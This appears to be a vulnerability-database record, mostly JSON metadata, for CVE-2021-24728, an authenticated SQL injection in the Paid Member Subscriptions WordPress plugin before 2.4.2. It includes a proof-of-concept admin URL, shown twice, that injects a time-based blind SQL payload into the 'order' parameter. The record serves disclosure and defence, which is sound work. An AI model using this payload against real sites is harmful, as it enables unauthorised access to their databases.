Description
The plugin did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages.
Related
{"id": "WPEX-ID:2277D335-1C90-4FA8-B0BF-25873C039C38", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "Paid Member Subscriptions < 2.4.2 - Authenticated SQL Injection", "description": "The plugin did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages.\n", "published": "2021-08-06T00:00:00", "modified": "2021-09-10T16:04:27", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "", "reporter": "wpvulndb", "references": ["https://plugins.trac.wordpress.org/changeset/2566399/paid-member-subscriptions", "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=29172"], "cvelist": ["CVE-2021-24728"], "immutableFields": [], "lastseen": "2021-11-26T19:23:29", "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24728"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:2277D335-1C90-4FA8-B0BF-25873C039C38"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24728"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:2277D335-1C90-4FA8-B0BF-25873C039C38"]}]}, "exploitation": null, "vulnersScore": 5.1}, "sourceData": "http://www.example.com/wp-admin/admin.php?page=pms-members-page&orderby=user_id&order=asc,(select * from (select(sleep(10)))a)", "generation": 0, "_state": {"dependencies": 1646034654}}
{"wpvulndb": [{"lastseen": "2021-11-26T19:23:29", "description": "The plugin did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages.\n\n### PoC\n\nhttp://www.example.com/wp-admin/admin.php?page=pms-members-page&orderby;=user_id&order;=asc,(select * from (select(sleep(10)))a)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-06T00:00:00", "type": "wpvulndb", "title": "Paid Member Subscriptions < 2.4.2 - Authenticated SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24728"], "modified": "2021-09-10T16:04:27", "id": "WPVDB-ID:2277D335-1C90-4FA8-B0BF-25873C039C38", "href": "https://wpscan.com/vulnerability/2277d335-1c90-4fa8-b0bf-25873c039c38", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T15:03:02", "description": "The Membership & Content Restriction \u2013 Paid Member Subscriptions WordPress plugin before 2.4.2 did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-24728", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24728"], "modified": "2021-09-23T15:00:00", "cpe": [], "id": "CVE-2021-24728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24728", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}]}
Paid Member Subscriptions < 2.4.2 - Authenticated SQL Injection
